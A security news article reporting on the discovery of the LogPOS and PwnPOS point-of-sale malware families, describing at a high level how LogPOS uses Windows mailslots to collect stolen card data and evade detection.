Security researchers have discovered two point-of-sale (POS) malware families: “PwnPOS,” which showcases attackers' “simple but thoughtful construction” for skirting detection, and the “LogPOS” family that uses Microsoft Windows' mailslots to deliver stolen credit card data to attackers.
The latter threat, LogPOS, was uncovered by Cincinatti-based security firm Morphick last week.
In a blog post, Morphick researcher Nick Hoffman explained that using Windows mailslots “isn't a new mechanism for malware,” as it has been previously leveraged in APT attacks, but one that has apparently been added to POS malware authors' arsenals. According to Microsoft, a mailslot is a mechanism for one-way interprocess communications (IPC), where applications can store messages and mailslot owners can retrieve them. In this case, the authors of LogPOS took advantage of the mechanism to store, and later collect, credit card data, Hoffman wrote.
“Because LogPOS injects code into various processes and has each of them search their own memory, it can't use a log, since they can't all open the same file with write access at once,” Hoffman wrote. “Instead, it uses mailslots.”
“In this case, the main executable creates the mailslot and acts as the mailslot server, while the code injected into the various processes acts as a client, writing carved credit card numbers to the mailslot for direct transmission to the C2 [server],” he explained later.
In its blog post, the firm published a YARA rule so enterprises can detect LogPOS variants.
Hoffman noted that the malware family's mailslot capability helps it skirt traditional methods for identifying POS threats, like scanning files for unencrypted credit card information, since the malware instead writes the data to a mailslot. He added that, as the discovery of new POS malware families continues, he doesn't expect the trend to slow down despite the community's efforts to thwart such threats.
Last week, Trend Micro threat analyst Jay Yaneza unveiled information on another new POS malware family, dubbed “PwnPOS.” Potentially active since 2013, Yaneza said that the malware was able to “fly under the radar all these years due to its simple but thoughtful construction.”